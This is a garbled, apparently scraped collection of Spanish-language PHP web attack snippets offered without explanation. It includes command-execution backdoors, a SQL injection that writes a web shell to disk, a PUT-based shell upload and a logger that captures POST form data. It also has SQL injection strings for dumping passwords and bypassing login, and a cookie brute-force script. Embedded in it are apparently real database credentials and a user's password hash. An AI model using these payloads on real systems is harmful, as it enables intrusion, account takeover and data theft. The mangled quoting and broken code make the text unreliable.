phpecho $_GET[`comando`];
phpsystem( $_GET[`comando`]);
phpshow_code( $_GET[`comando`]);
www.dondeestemontado.com/test.php?comando=index.php
phpif(strpos($HTTP_POST_FILES[`file`][`type`],"jpg"))
php$tipo=explode(".",$nombreFIle);if($tipo[1]==`jpg`){echo "paso";}
union+select+,1,2,` system($_GET[cmd]); `+into+oufile+ruta/shell.php
allow_url_include = Onallow_url_fopen = On
PUT /archivo.php HTTP/1.1Host: Ficticio.comContent-Type: text/plainContent-Length:4
phpaqui code de la shell
$user_db = `i1n1f3o4_admin`; // Server Username $pass_db = `infor2005`; // Server Password$host_db = `localhost`; // Server (e.g. localhost)$db = `i1n1f3o4_encuesta`; // Database to be created or name of existing database (Please note: Database containing dashes cannot be created)
phpforeach($_POST as $index => $valor){$log="[in]".$log.$index." = > ".$valor."[in]";}$logFile= fopen(`logs.txt`, `a`);fwrite($logFile, $log."n");
phpif($_GET[`activeshell`]==`activar`){system( $_GET[`comando`]);}
+union+select+1,user,password,4,5,6,7,8,9,10+from+usuario+limit+5,1
edwinc:13dd3a9725dba7a9
select password(`passdigitado`) as cryptado
select * from usuarios where user =`usuariodigitado`
edwinc
aku`),`13dd3a9725dba7a9` as cryptado /*
/* ` -- `# `
php$query="select * from usuarios where login like(`".$_POST[`login`]."`) and password like(`".$_GET[`password`].`"");
login: %a%password:%
login: %ac%password:%
login: %ad%password:%
javascript:document.cookie =`nombreCookie=valor expires=Thu, 30 Aug 2009 20:47:11 UTC; path=/`
phpecho $_GET[`mensaje`];
php$cookie = $_GET[`datos`];$handler = fopen(`datos.txt`, `a`);fwrite($handler, $datos."");
setCookie(“nombre”,$valor,$date,$directorio,$dominio);
php define(NAMEFILE,"cookies.html");echo "#######################################################################################Cookie Brute Force by _4nd33xD_ ##Usage php cooker.php http://www.website.com/path/index.php cookieName dict.txt##Gretz M@ndrake Black Team White-Shadow,Safety Last Group #######################################################################################";$host =$argv[1];$cookieName=$argv[2];$dict =$argv[3];if(empty($host) || empty($mode) || empty($cookieName) || empty($dict)){echo "verifique parametros";die();}function loadData($diccionario) { $fp = $diccionario; $strs=file($fp); return $strs; } function savePage($cont) { $fp = fopen(NAMEFILE,"ab "); fwrite($fp,$cont.""); fclose($fp); }$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)"; }$cookies=loadData($dict); foreach($cookies as $index => $cookie) { echo "".$cookie.""; $i ; $ch = curl_init($host); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIE,$cookieName."=".$cookie); $source=curl_exec ($ch); curl_close ($ch); if(strpos($source, `Palabra Clave`)){ echo "cookie crackeada ".$i; savePage($cookie); }else{ echo "cookie no crackeada ".$i; } }
phpif($_COOKIE[`admin`]=`true`){echo "Usuario autenticado";}else{echo "Bienvenido visitante";}
php$query="select * from usuario where $login=`$_COOKIE[login]` and password=`$_COOKIE[`password`]`";
select * from usuario where $login=1` or 1=1 --